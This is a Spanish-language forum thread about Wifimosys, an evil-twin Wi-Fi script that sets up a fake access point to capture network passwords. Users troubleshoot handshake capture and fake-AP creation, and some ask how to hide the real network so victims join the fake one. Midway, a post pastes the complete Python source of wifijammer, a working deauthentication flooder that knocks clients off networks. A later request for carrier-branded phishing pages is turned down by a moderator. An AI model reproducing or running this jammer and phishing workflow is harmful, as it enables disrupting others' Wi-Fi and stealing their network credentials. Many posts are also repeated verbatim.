me estaba mirando el nombre y ciertamente es de muy mal gusto, supongo que Fimosis en ingles quiere decir otra cosa jajajaja
Dear Members,
I dont know if this problem has been reported but, when I launch "wifimosys" everything works fine but ther is "no fake AP" created. does anyoe knows about the problem?
Google translator:
"Queridos miembros,
No sé si este problema se ha informado, pero cuando lanzo "wifimosys" todo funciona bien, pero ther es "no falso AP" creado. ¿Alguien sabe sobre el problema?"
He tenido el mismo problema, y creo que es culpa de la alfa AWUS036H
Jo, que casi se me pasa... quiero agradecer públicamente a USUARIONUEVO haber incluido wifimosys en la versión x64 de Wifislax, al menos en las versiones de desarrollo, ojalá en la final ^-^ ;)
Un placer haber podido colaborar en algo, aunque sea poquita cosa.
probada y todo ok
¿Parece entonces que el AP falso no corre en Wifislax 4.12? ¿Qué versión recomiendan instalar?
Yo no habria quitado el chequeo de dependencias ..
Aunque estan todas puedes eliminar un paquete sin saber que te hara falta para este script.
con wifimosys me cuesta mas obtener el handshake, con linset lo obtenia bastante rapido y sin embargo con este , de 15 pruebas que he realizado, solo me lo ha obtenido en una , usando tanto el modo normal como el obstinado, ¿sabeis que puede ocurrir
con wifimosys me cuesta mas obtener el handshake, con linset lo obtenia bastante rapido y sin embargo con este , de 15 pruebas que he realizado, solo me lo ha obtenido en una , usando tanto el modo normal como el obstinado, ¿sabeis que puede ocurrir
Te comento: Wifimosys usa pyrit para testear el handshake. Linset lo podía hacer con aircrack, mucho más permisivo y que permitía continuar con handshakes incompletos. El caso es que Wifimosys guarda el handshake en una carpeta para posibles usos con otras aplicaciones, con lo cual decidí que pasase el chequeo más "estricto" y que así fuese válido para cualquier uso posterior con cualquier otro programa.
En resumen, cuesta un poco más obtenerlo pero cuando lo tienes es mucho más útil que el simple chequeado por aircrack ya que te puedes usarlo con todas las garantías para, por ejemplo, pasarle un diccionario a fuerza bruta.
Saludos !!
Disculpen la ignorancia pero la versión mejorada de linset (FLUXION) en que se diferencia.? corre mejor o acaso el index trae menos errores?
tengo una duda por que con linset fluxion y este programa en wifislax no puedo crear ap fake en el canal 13 es problema de mi tarjeta?
tengo una duda por que con linset fluxion y este programa en wifislax no puedo crear ap fake en el canal 13 es problema de mi tarjeta?
Lo acabo de probar y no he tenido ningún problema en atacar una red en el canal 13.
Creo recordar que algunas Atheros no funcionaban con los canales 12 y 13. Pero esto me suena de hace tiempo, desconozco si se solucionó.
Saludos.
Yo uso wifislas boteeado soy novato... en este apartado pone wifislax linux , me valdria? inicio wifislax desde bios y wifislax ya es linux.... por lo tanto no entiendo nada................................ ??? por que hacen dos apartados? por ultimo alguien me envia un video de como instalar este programa en wifislax si no me busco la vida....tambien tengo una duda en mi wifislax tengo el problema de que muchas veces le doy a guardar algo y cuando apago el pc se borra..............
Yo uso wifislas boteeado soy novato... en este apartado pone wifislax linux , me valdria? inicio wifislax desde bios y wifislax ya es linux.... por lo tanto no entiendo nada................................ ??? por que hacen dos apartados? por ultimo alguien me envia un video de como instalar este programa en wifislax si no me busco la vida....tambien tengo una duda en mi wifislax tengo el problema de que muchas veces le doy a guardar algo y cuando apago el pc se borra..............viejo busca en youtube como instalar modulos en wifislax...
Tengo el handshake guardado en la carpeta handshake pero cuando lo copio en wifimosys .... Me dice archivo no encontrado. Una ayuda porfa. Gracias
Yo uso wifislas boteeado soy novato... en este apartado pone wifislax linux , me valdria? inicio wifislax desde bios y wifislax ya es linux.... por lo tanto no entiendo nada................................ ??? por que hacen dos apartados?
por ultimo alguien me envia un video de como instalar este programa en wifislax si no me busco la vida....
tambien tengo una duda en mi wifislax tengo el problema de que muchas veces le doy a guardar algo y cuando apago el pc se borra..............
Hola muchas gracias por contestar. Tengo el handshake capturado en la carpeta root/ handshakes . Pero no entiendo lo que me dices. Donde lo tengo que copiar para que me lo reconozca wifimosys? Le doy botón derecho sobre el archivo.cap y lo pego en wifimosys y me dice no encontrado. Vaya lío. Perdona pero esto se me da muy mal.
Tengo el handshake guardado en la carpeta handshake pero cuando lo copio en wifimosys .... Me dice archivo no encontrado. Una ayuda porfa. Gracias
Si te dice archivo no encontrado es eso mismo: no encontrado. O sea, que la ruta que has puesto no es correcta.
Si lo tienes en la carpeta /root/handshakes en Wifimosys solo tienes que poner el nombre del mismo y la extensión (ej: wifimosys.cap).
De todas formas te aconsejo capturar el handshake con Wifimosys aunque cueste un poco más (en una de las respuestas de arriba explico porqué).
Saludos.
Tienes que meter el handshake capturado con wifimosys en la carpeta handshakes de la carpeta personal de Wifislax. Una vez lo tengas metido ahí ya te lo reconocerá wifimosys.Hola muchas gracias por contestar. Tengo el handshake capturado en la carpeta root/ handshakes . Pero no entiendo lo que me dices. Donde lo tengo que copiar para que me lo reconozca wifimosys? Le doy botón derecho sobre el archivo.cap y lo pego en wifimosys y me dice no encontrado. Vaya lío. Perdona pero esto se me da muy mal.
Tengo el handshake guardado en la carpeta handshake pero cuando lo copio en wifimosys .... Me dice archivo no encontrado. Una ayuda porfa. Gracias
Si te dice archivo no encontrado es eso mismo: no encontrado. O sea, que la ruta que has puesto no es correcta.
Si lo tienes en la carpeta /root/handshakes en Wifimosys solo tienes que poner el nombre del mismo y la extensión (ej: wifimosys.cap).
De todas formas te aconsejo capturar el handshake con Wifimosys aunque cueste un poco más (en una de las respuestas de arriba explico porqué).
Saludos.
enviado desde mi s6 edge + gold 64gb
Vodker, he encontrado un problema y es que no guarda el handshake cuando el nombre de la red tiene un espacio en blanco. Al menos en la carpeta handshakes no aparece cuando se ha capturado.
Gracias.
El problema esque wifimosys no le saca el handshake de mi red. Lo e tenido que sacar con el handshaker. Y lo que pregunto es que como hago para meter el handshake capturado con handshaker en wifimosys y así que este me lo reconozca. No sé si me explico bien. Un saludo y graciasTienes que meter el handshake capturado con wifimosys en la carpeta handshakes de la carpeta personal de Wifislax. Una vez lo tengas metido ahí ya te lo reconocerá wifimosys.Hola muchas gracias por contestar. Tengo el handshake capturado en la carpeta root/ handshakes . Pero no entiendo lo que me dices. Donde lo tengo que copiar para que me lo reconozca wifimosys? Le doy botón derecho sobre el archivo.cap y lo pego en wifimosys y me dice no encontrado. Vaya lío. Perdona pero esto se me da muy mal.
Tengo el handshake guardado en la carpeta handshake pero cuando lo copio en wifimosys .... Me dice archivo no encontrado. Una ayuda porfa. Gracias
Si te dice archivo no encontrado es eso mismo: no encontrado. O sea, que la ruta que has puesto no es correcta.
Si lo tienes en la carpeta /root/handshakes en Wifimosys solo tienes que poner el nombre del mismo y la extensión (ej: wifimosys.cap).
De todas formas te aconsejo capturar el handshake con Wifimosys aunque cueste un poco más (en una de las respuestas de arriba explico porqué).
Saludos.
enviado desde mi s6 edge + gold 64gb
Vodker, he encontrado un problema y es que no guarda el handshake cuando el nombre de la red tiene un espacio en blanco. Al menos en la carpeta handshakes no aparece cuando se ha capturado.
Gracias.
Yo he probado a meter los handshake capturados por Handshaker y siempre me dice wifimosys que está corrupto cuando no es así. Creo que sólo admite los probados por pyrit.
Hey que tal amigos...
he estado probando el script y veo una novedad con una red en particular, y resulta que nunca aparece con clientes. (cosa que es falsa porque a esa red siempre hay alguien conectado). mi pregunta es la siguiente, hay alguna opcion dentro de los routers de movistar (si no estoy mal son mitrastar). que impidan que se vean los clientes que se encuentren conectados a dicha red.
Nota: cabe mencionar que la red tambien tiene el Essid oculto...
no se por que no se puede solucionar el problema de seguridad de https que no aparesca el login o detecte como inseguro
Vodker, ¿puedes corregir que en redes que llevan de nombre un espacio no guarda el handshake en su carpeta?
Otra cosa, ¿se puede modificar este ataque para que siga funcionando incluso cuando la red cambia de canal?
Y por último, ¿existe alguna versión de Wifislax que incluya wifimosys ya instalado? No encuentro la última versión de testeo disponible. Las que hay son de finales del año pasado.
Esperando con ganas esa actualuzación con SSL si lo consigues. Un saludo y gracias
Gracias por todo.
Es una pena no tener yo una noción en programación porque tengo una excelente idea para todos los evil twin attack como Linset, Fluxion o este mismo.
La idea sería al crear FAKEAP se oculte la verdadera para que si o si la persona se conecte al punto falso. Lo acabo de probar en mi LG android y ni mi madre que no sabe usar el Paint se traga que haya 2 redes iguales. ¿Como se haría?
Saludos y a seguir trabajando.
Vodker, ¿puedes corregir que en redes que llevan de nombre un espacio no guarda el handshake en su carpeta?
Otra cosa, ¿se puede modificar este ataque para que siga funcionando incluso cuando la red cambia de canal?
Y por último, ¿existe alguna versión de Wifislax que incluya wifimosys ya instalado? No encuentro la última versión de testeo disponible. Las que hay son de finales del año pasado.
Esperando con ganas esa actualuzación con SSL si lo consigues. Un saludo y gracias
Gracias por todo.
Me ha ocurrido algunas veces en VMWare que deja de detectar el adaptador y Wifimosys lógicamente no lo encuentra y tira el error.
Simplemente vuelve a conectarlo ;)
Es imposible por coj*nes probar con éxito el script en tooooodas las marcas y modelos de AP's del mercado, así como en toooodos los hardwares y sistemas de clientes "víctimas" (sobremesas de diferentes versiones de Windows o Mac, IOS, Android, Winphones, etc.), espero que todo el mundo sea consciente de esto.
Se agradecen los reportes de errores pero si no indicáis marca y modelo del escenario donde falla, poco se puede hacer para solventarlo.
Y sobre todo recordad que yo no tengo ni p*ta idea de programar, que para mi lo del "ensayo y error" es el día a día en estos temas y solo salgo adelante con algunas cosillas que me propongo por pura cabezonería ;D
Saludos.
Vodker, ¿puedes corregir que en redes que llevan de nombre un espacio no guarda el handshake en su carpeta?
Otra cosa, ¿se puede modificar este ataque para que siga funcionando incluso cuando la red cambia de canal?
Y por último, ¿existe alguna versión de Wifislax que incluya wifimosys ya instalado? No encuentro la última versión de testeo disponible. Las que hay son de finales del año pasado.
Esperando con ganas esa actualuzación con SSL si lo consigues. Un saludo y gracias
Gracias por todo.
He hecho pruebas y efectivamente, cuando una red tiene espacios el handshake no se guarda en la carpeta "handshakes". Sin embargo lo puedes copiar desde /tmp/wifimosys. Esto no afecta al ataque (ver foto). Intentaré corregirlo próximamente, al igual que lo del cambio de canal.
Ah, y la versión de 64 bits (https://foro.seguridadwireless.net/live-wifislax/liberada-wifislax64-1-0-version-final-para-descargar/ (https://foro.seguridadwireless.net/live-wifislax/liberada-wifislax64-1-0-version-final-para-descargar/)) ya lo tiene incluido.
Saludos.
(http://fotos.subefotos.com/84bfa0deb4fa06d2aa033b7985c94c5ao.jpg)
amigo por que a mi no me funciona en el canal 13 el fake ap? (se debe a mi tarjeta mini pci ar 9485?)
que tarjeta usas?
uso la ultima version para 64
amigo por que a mi no me funciona en el canal 13 el fake ap? (se debe a mi tarjeta mini pci ar 9485?)
que tarjeta usas?
uso la ultima version para 64
Yo diría que es cosa de las tarjetas. Creo recordar que según donde esté fabricada, accede al canal 13 o no dependiendo de la regulación de radiofrecuencias de ese país. Pero como digo es algo que me suena haber leído, igual he dicho una burrada.
Lo que sí confirmo es que al script le da igual el canal funcionando en todos. La tarjeta que uso habitualmente es una Ralink 2870/3070.
Saludos.
buenos dias, a ver si alguien me puede echar una manilla, resulta que tanto
wifimosys como linset me da esta respuesta al escanear redes.
wc: /tmp/Wifimosys/dump-01.csv: No existe el fichero o el directorio
/usr/bin/wifimosys: línea 396: [: -le: se esperaba un operador unario
cat: /tmp/Wifimosys/dump-01.csv: No existe el fichero o el directorio
expr: error de sintaxis
LISTADO DE REDES
Nº MAC CANAL TIPO PWR NOMBRE DE LA RED
grep: el: No existe el fichero o el directorio
grep: número: No existe el fichero o el directorio
grep: de: No existe el fichero o el directorio
grep: líneas: No existe el fichero o el directorio
grep: no: No existe el fichero o el directorio
grep: es: No existe el fichero o el directorio
grep: válido:: No existe el fichero o el directorio
grep: «/tmp/Wifimosys/dump-01.csv»: No existe el fichero o el directorio
1) head: el número de líneas no es válido: «/tmp/Wifimosys/dump-01.csv» 100%
(*) En rojo: redes con posibles clientes activos
Selecciona el nº de la red a atacar...
(Para reescanear pulsa r Para salir pulsa x)
lo raro es que fluxion funciona bien, uso una antena alfa chipset 3070 en
la ultima version de wifislax,
es la segunda vez que me ocurre este error.
La primera vez borre el sistema lo volvi a instalar y asunto solucionado. ;D
Esta vez antes de formatear de nuevo,pues tengo el sistema personalizado y
actualizado he decidido consultarlo aqui en el foro, en busca de alguna
solucion ??? gracias.
salu2
no se monta hanskake
se da dirrecion en la pantalla cuando te dice si tienes uno mete direccion del hanskake
puedes tenerlo en donde quieras solo has de añadir la direccion donde esta el hanskake
yo lo uso en escritorio
/root/Desktop/mi.cap
------------
no es la carpeta temp aun asi aunque lo metas en la direccion
es /tmp /wifimosis/mi.cap
tendras que decirle a wifimosys en la pantalla que te pide la direccion del cap o hanskake como queramos llamarlo
alguien sabe como montar el handshake en wifimosys?? lo pongo en la carpeta temp/wifimosys y no lo detecta
alguien sabe como montar el handshake en wifimosys?? lo pongo en la carpeta temp/wifimosys y no lo detecta
Lo ideal es ponerlo en /root/handshakes. En ese caso en Wifimosys solo habrás de poner el nombre y la extensión (XXXXX.cap).
Si lo tienes en otro lugar tienes que poner la ruta completa.
Si aún así no lo acepta, es que está corrupto como dice drvalium, pero eso ya te lo dirá el script al comprobarlo.
Saludos.
no quiero meter prisas ;D
Vodker, ¿qué novedades trae?
probado en Wifislax v4.12 y no funciona
¿Alguien con Wifislax64, cierta soltura en usar Wifimosys y suficientes cacharretes...
- Desautentificación mejorada con wifijammer en lugar de aireplay-ng (no he podido probarlo con routers que hacen channel hopping, pero en teoría ahora desautentifica a los clientes conectados, no al punto de acceso).
#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up Scapy
from scapy.all import *
conf.verb = 0 # Scapy I thought I told you to shut up
import os
import sys
import time
from threading import Thread, Lock
from subprocess import Popen, PIPE
from signal import SIGINT, signal
import argparse
import socket
import struct
import fcntl
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
T = '\033[93m' # tan
def parse_args():
#Create the arguments
parser = argparse.ArgumentParser()
parser.add_argument("-s",
"--skip",
nargs='*',
default=[],
help="Skip deauthing this MAC address. \
Example: -s 00:11:BB:33:44:AA")
parser.add_argument("-i",
"--interface",
help="Choose monitor mode interface. \
By default script will find the most powerful \
interface and starts monitor mode on it. \
Example: -i mon5")
parser.add_argument("-c",
"--channel",
help="Listen on and deauth only clients on the specified channel. \
Example: -c 6")
parser.add_argument("-m",
"--maximum",
help="Choose the maximum number of clients to deauth. \
List of clients will be emptied and repopulated \
after hitting the limit. Example: -m 5")
parser.add_argument("-n",
"--noupdate",
help="Do not clear the deauth list when the maximum (-m) \
number of client/AP combos is reached. \
Must be used in conjunction with -m. \
Example: -m 10 -n",
action='store_true')
parser.add_argument("-t",
"--timeinterval",
help="Choose the time interval between packets being sent. \
Default is as fast as possible. \
If you see scapy errors like 'no buffer space' \
try: -t .00001")
parser.add_argument("-p",
"--packets",
help="Choose the number of packets to send in each deauth burst. \
Default value is 1; \
1 packet to the client and 1 packet to the AP. \
Send 2 deauth packets to the client \
and 2 deauth packets to the AP: -p 2")
parser.add_argument("-d",
"--directedonly",
help="Skip the deauthentication packets to the broadcast \
address of the access points and only send them \
to client/AP pairs",
action='store_true')
parser.add_argument("-a",
"--accesspoint",
nargs='*',
default=[],
help="Enter the SSID or MAC address of a specific access point to target")
parser.add_argument("--world",
help="N. American standard is 11 channels but the rest \
of the world it's 13 so this options enables the \
scanning of 13 channels",
action="store_true")
return parser.parse_args()
########################################
# Begin interface info and manipulation
########################################
def get_mon_iface(args):
global monitor_on
monitors, interfaces = iwconfig()
if args.interface:
monitor_on = True
return args.interface
if len(monitors) > 0:
monitor_on = True
return monitors[0]
else:
# Start monitor mode on a wireless interface
print '['+G+'*'+W+'] Finding the most powerful interface...'
interface = get_iface(interfaces)
monmode = start_mon_mode(interface)
return monmode
def iwconfig():
monitors = []
interfaces = {}
try:
proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
except OSError:
sys.exit('['+R+'-'+W+'] Could not execute "iwconfig"')
for line in proc.communicate()[0].split('\n'):
if len(line) == 0: continue # Isn't an empty string
if line[0] != ' ': # Doesn't start with space
wired_search = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line)
if not wired_search: # Isn't wired
iface = line[:line.find(' ')] # is the interface
if 'Mode:Monitor' in line:
monitors.append(iface)
elif 'IEEE 802.11' in line:
if "ESSID:\"" in line:
interfaces[iface] = 1
else:
interfaces[iface] = 0
return monitors, interfaces
def get_iface(interfaces):
scanned_aps = []
if len(interfaces) < 1:
sys.exit('['+R+'-'+W+'] No wireless interfaces found, bring one up and try again')
if len(interfaces) == 1:
for interface in interfaces:
return interface
# Find most powerful interface
for iface in interfaces:
count = 0
proc = Popen(['iwlist', iface, 'scan'], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
if ' - Address:' in line: # first line in iwlist scan for a new AP
count += 1
scanned_aps.append((count, iface))
print '['+G+'+'+W+'] Networks discovered by '+G+iface+W+': '+T+str(count)+W
try:
interface = max(scanned_aps)[1]
return interface
except Exception as e:
for iface in interfaces:
interface = iface
print '['+R+'-'+W+'] Minor error:',e
print ' Starting monitor mode on '+G+interface+W
return interface
def start_mon_mode(interface):
print '['+G+'+'+W+'] Starting monitor mode off '+G+interface+W
try:
os.system('ifconfig %s down' % interface)
os.system('iwconfig %s mode monitor' % interface)
os.system('ifconfig %s up' % interface)
return interface
except Exception:
sys.exit('['+R+'-'+W+'] Could not start monitor mode')
def remove_mon_iface(mon_iface):
os.system('ifconfig %s down' % mon_iface)
os.system('iwconfig %s mode managed' % mon_iface)
os.system('ifconfig %s up' % mon_iface)
def mon_mac(mon_iface):
'''
http://stackoverflow.com/questions/159137/getting-mac-address
'''
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
print '['+G+'*'+W+'] Monitor mode: '+G+mon_iface+W+' - '+O+mac+W
return mac
########################################
# End of interface info and manipulation
########################################
def channel_hop(mon_iface, args):
'''
First time it runs through the channels it stays on each channel for 5 seconds
in order to populate the deauth list nicely. After that it goes as fast as it can
'''
global monchannel, first_pass
channelNum = 0
maxChan = 11 if not args.world else 13
err = None
while 1:
if args.channel:
with lock:
monchannel = args.channel
else:
channelNum +=1
if channelNum > maxChan:
channelNum = 1
with lock:
first_pass = 0
with lock:
monchannel = str(channelNum)
try:
proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE)
except OSError:
print '['+R+'-'+W+'] Could not execute "iw"'
os.kill(os.getpid(),SIGINT)
sys.exit(1)
for line in proc.communicate()[1].split('\n'):
if len(line) > 2: # iw dev shouldnt display output unless there's an error
err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W
output(err, monchannel)
if args.channel:
time.sleep(.05)
else:
# For the first channel hop thru, do not deauth
if first_pass == 1:
time.sleep(1)
continue
deauth(monchannel)
def deauth(monchannel):
'''
addr1=destination, addr2=source, addr3=bssid, addr4=bssid of gateway if there's
multi-APs to one gateway. Constantly scans the clients_APs list and
starts a thread to deauth each instance
'''
pkts = []
if len(clients_APs) > 0:
with lock:
for x in clients_APs:
client = x[0]
ap = x[1]
ch = x[2]
# Can't add a RadioTap() layer as the first layer or it's a malformed
# Association request packet?
# Append the packets to a new list so we don't have to hog the lock
# type=0, subtype=12?
if ch == monchannel:
deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()
deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()
pkts.append(deauth_pkt1)
pkts.append(deauth_pkt2)
if len(APs) > 0:
if not args.directedonly:
with lock:
for a in APs:
ap = a[0]
ch = a[1]
if ch == monchannel:
deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap)/Dot11Deauth()
pkts.append(deauth_ap)
if len(pkts) > 0:
# prevent 'no buffer space' scapy error http://goo.gl/6YuJbI
if not args.timeinterval:
args.timeinterval = 0
if not args.packets:
args.packets = 1
for p in pkts:
send(p, inter=float(args.timeinterval), count=int(args.packets))
def output(err, monchannel):
os.system('clear')
if err:
print err
else:
print '['+G+'+'+W+'] '+mon_iface+' channel: '+G+monchannel+W+'\n'
if len(clients_APs) > 0:
print ' Deauthing ch ESSID'
# Print the deauth list
with lock:
for ca in clients_APs:
if len(ca) > 3:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2].ljust(2)+' - '+T+ca[3]+W
else:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2]
if len(APs) > 0:
print '\n Access Points ch ESSID'
with lock:
for ap in APs:
print '['+T+'*'+W+'] '+O+ap[0]+W+' - '+ap[1].ljust(2)+' - '+T+ap[2]+W
print ''
def noise_filter(skip, addr1, addr2):
# Broadcast, broadcast, IPv6mcast, spanning tree, spanning tree, multicast, broadcast
ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:', mon_MAC]
if skip:
ignore += [addr.lower() for addr in skip]
for i in ignore:
if i in addr1 or i in addr2:
return True
def cb(pkt):
'''
Look for dot11 packets that aren't to or from broadcast address,
are type 1 or 2 (control, data), and append the addr1 and addr2
to the list of deauth targets.
'''
global clients_APs, APs
# return these if's keeping clients_APs the same or just reset clients_APs?
# I like the idea of the tool repopulating the variable more
if args.maximum:
if args.noupdate:
if len(clients_APs) > int(args.maximum):
return
else:
if len(clients_APs) > int(args.maximum):
with lock:
clients_APs = []
APs = []
# We're adding the AP and channel to the deauth list at time of creation rather
# than updating on the fly in order to avoid costly for loops that require a lock
if pkt.haslayer(Dot11):
if pkt.addr1 and pkt.addr2:
pkt.addr1 = pkt.addr1.lower()
pkt.addr2 = pkt.addr2.lower()
# Filter out all other APs and clients if asked
if args.accesspoint:
# track bssid for essid
if (pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp)) and pkt[Dot11Elt].info in args.accesspoint:
args.accesspoint.add(pkt[Dot11].addr3.lower())
# bail if bssid is not in target list
if not args.accesspoint.intersection([pkt.addr1.lower(), pkt.addr2.lower()]):
# pkt does not match our target list
return
if args.skip:
if pkt.addr2 in args.skip:
return
# Check if it's added to our AP list
if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
APs_add(clients_APs, APs, pkt, args.channel, args.world)
# Ignore all the noisy packets like spanning tree
#if noise_filter(skip, pkt.addr1, pkt.addr2):
# return
# Management = 1, data = 2
if pkt.type in [1, 2]:
clients_APs_add(clients_APs, pkt.addr1, pkt.addr2)
def APs_add(clients_APs, APs, pkt, chan_arg, world_arg):
ssid = pkt[Dot11Elt].info
bssid = pkt[Dot11].addr3.lower()
try:
# Thanks to airoscapy for below
ap_channel = str(ord(pkt[Dot11Elt:3].info))
chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11'] if not args.world else ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13']
if ap_channel not in chans:
return
if chan_arg:
if ap_channel != chan_arg:
return
except Exception as e:
return
if len(APs) == 0:
with lock:
return APs.append([bssid, ap_channel, ssid])
else:
for b in APs:
if bssid in b[0]:
return
with lock:
return APs.append([bssid, ap_channel, ssid])
def clients_APs_add(clients_APs, addr1, addr2):
if len(clients_APs) == 0:
if len(APs) == 0:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
else:
AP_check(addr1, addr2)
# Append new clients/APs if they're not in the list
else:
for ca in clients_APs:
if addr1 in ca and addr2 in ca:
return
if len(APs) > 0:
return AP_check(addr1, addr2)
else:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
def AP_check(addr1, addr2):
for ap in APs:
if ap[0].lower() in addr1.lower() or ap[0].lower() in addr2.lower():
with lock:
return clients_APs.append([addr1, addr2, ap[1], ap[2]])
def stop(signal, frame):
if monitor_on:
sys.exit('\n['+R+'!'+W+'] Closing')
else:
remove_mon_iface(mon_iface)
os.system('service network-manager restart')
sys.exit('\n['+R+'!'+W+'] Closing')
if __name__ == "__main__":
if os.geteuid():
sys.exit('['+R+'-'+W+'] Please run as root')
clients_APs = []
APs = []
DN = open(os.devnull, 'w')
lock = Lock()
args = parse_args()
args.skip = list(map(str.lower, args.skip))
# lowercase bssids while leaving essids intact
args.accesspoint = set(_.lower() if ':' in _ else _ for _ in args.accesspoint)
monitor_on = None
mon_iface = get_mon_iface(args)
conf.iface = mon_iface
mon_MAC = mon_mac(mon_iface)
first_pass = 1
# Start channel hopping
hop = Thread(target=channel_hop, args=(mon_iface, args))
hop.daemon = True
hop.start()
signal(SIGINT, stop)
try:
sniff(iface=mon_iface, store=0, prn=cb)
except Exception as msg:
remove_mon_iface(mon_iface)
os.system('service network-manager restart')
print '\n['+R+'!'+W+'] Closing'
sys.exit(0)
esto es buenisimo >:( >:( >:(
¿y en que te basas para decir que es mejor que aireplay?
¿has leido el codigo de wifijammer?
yo lo habri en su dia, y a no ser que haya cambiado no veo ninguna funcionalidad distinta a las que tiene aireplay.
los dos consisten en mandar paquetes deauth, luego ¿cual es la diferencia?
¿que uno esta escrito en c y el otro en python?
-p, Send 5 packets to the client from the AP and 5 packets to the AP from the client along with 5 packets to the broadcast address of the AP
Pues la diferencia es que, según el autor la opción -p funciona y permite ayudar en el tema de la desautentificación ante un router que cambia de canal al repartir los paquetes y así que no sea constantemente, que es lo que estaba intentando conseguir. Y porque ya probé tanto con aireplay-ng como con mdk3 y este va mejor, más rápido, es más bonico y más apañao ;DCódigo: [Seleccionar]-p, Send 5 packets to the client from the AP and 5 packets to the AP from the client along with 5 packets to the broadcast address of the AP
-p, envía 5 paquetes al cliente del AP y 5 paquetes al AP del cliente junto con 5 paquetes a la dirección de difusión del AP
no veo ahí nada de cambio de canal.
eso por un lado, y por otro, wifijammer te permite tener hostapd en un canal con el fake ap y con el mismo interface estar en otro canal mandando paquetes deauth?
porque yo lo que tengo probado es que con el mismo interface no puedes estar en misa y repicando las campanas. ;)
oye si lo permite me la envaino y eso si seria interesante.
Ahh, y yo creí que el ataque seguía válido aun cambiando de canal el router tras su reinicio.
Antes lo comprobé y efectivamente al cambiar de canal el router ya el ataque no es válido.
creo que tambien podria hacerse incluyendo la opcion elegir como desautenticar..y ya esta.Eso estaría muy bien porque creo que wifijammer también puede funcionar muy bien para evitar más cambios de canal. Estaría genial con esa opción.
hay poder elegir si wifijammer o aireplay
Ante todo, daros las gracias por el gran aporte que realizáis en toda la comunidad.
Bueno, mi caso es que al realizar un ataque a mi router sigo navegando con las tables y moviles que tengo, si que si me voy a escanear redes veo una con el mismo nombre que la mía, pero no me desautentifica a ningún cliente y sigo navegando sin problemas, no teniendo que preocuparme de buscar otra red o estar metiendo nada de nada en ningún sitio.
Si que he probado a conectarme a la red virtual que ha generado y entonces aparece el la ventanita de que tengo que introducir la contraseña, pero claro como la red buena no la bloquea, pues ningún cliente tiene que preocuparse de buscar.
¿Me podrias echar una mano para ver donde puedo tener el problema?
Muchas gracias.
Hola Amigo vodker, se hará la implementación de ambas opciones wa wifijamer y airoscritp para la siguiente actualización ??
Muchas gracias por esta herramienta, me facilitó mucho las pruebas que tenía que hacer con mi modem pero algo curioso me sucede: tanto con el linset original como con esta modificación, en la última versión de wifislax no me muestran los clientes conectados, tuve que bajar la 4.8 y todo funcionó de maravilla. Parece que falta algún módulo o dejaron de darle algo de soporte a mi tarjeta.
¿Y qué tarjeta tienes? Si no aportas más datos aquí no tenemos una bola de cristal para saberlo. Wifimosys, al igual que Linset, es un script. Esto quiere decir que no incorpora ninguna herramienta sino que automatiza y hace "fáciles" las ya existentes en Wifislax. Si un proceso de Wifimosys falla (por ejemplo el servidor HTTP) siempre puedes acudir a la herramienta original (en este caso lighttpd) y comprobar su funcionamiento en tu hardware. Si la original te sigue fallando, siempre te fallará en Wifimosys o Linset puesto que el script hace uso de la misma. Si por el contrario la original te funciona bien tras trastear con sus opciones entonces sí se puede arreglar la cosa en Wifimosys trasladando los cambios si los das a conocer.
Saludos.
Vodker compañero, ¿qué novedades traerá la nueva versión?
Lo del chip RTL8187L era un problema ya conocido. De hecho, creo recordar que era hostapd el que no funcionaba correctamente con ese chip (sí lo hacía airbase-ng en cambio).Con esta aplicacion si se puede crear un ap con espacios en el nombre.Me gustaria probarlo pero el archivo ya no esta disponible.
Intentaré hacer pruebas con airbase como alternativa si se detecta ese modelo de chipset (pero es un coñazo, hostapd es mucho más potente).
https://mega.nz/#!h1pRQQ5Y!KuArdRvOs2wx1rZZdnFLAk4616g7t4zsMEZ2JSB_e-c (https://mega.nz/#!h1pRQQ5Y!KuArdRvOs2wx1rZZdnFLAk4616g7t4zsMEZ2JSB_e-c)
Con esta aplicacion si se puede crear un ap con espacios en el nombre.Me gustaria probarlo pero el archivo ya no esta disponible.
Buenas tardes Vodker,:) Esperando la nueva versión
Sólo me he logueado para agradecer tu desarrollo y mejora del script de vk496, al cuál también agradezco.
En mi opinión para ser perfecto sólo le faltan diferentes index para hacerlo más real aún (Vodafone, Orange, Jazztel, Movistar, etc)
A la espera de sorpresas en tu nueva versión ;D
Un saludo!
En mi opinión para ser perfecto sólo le faltan diferentes index para hacerlo más real aún (Vodafone, Orange, Jazztel, Movistar, etc)
Eso nosotros no podemos hacerlo, los logos de esas empresas están protegidos por copyright y no son de uso público. En este foro solo hacemos cosas legales.
Lo que si puedes aprender es a modificar tu mismo el archivo HTML.
saludos
Buenas tardes Vodker,
Sólo me he logueado para agradecer tu desarrollo y mejora del script de vk496, al cuál también agradezco.
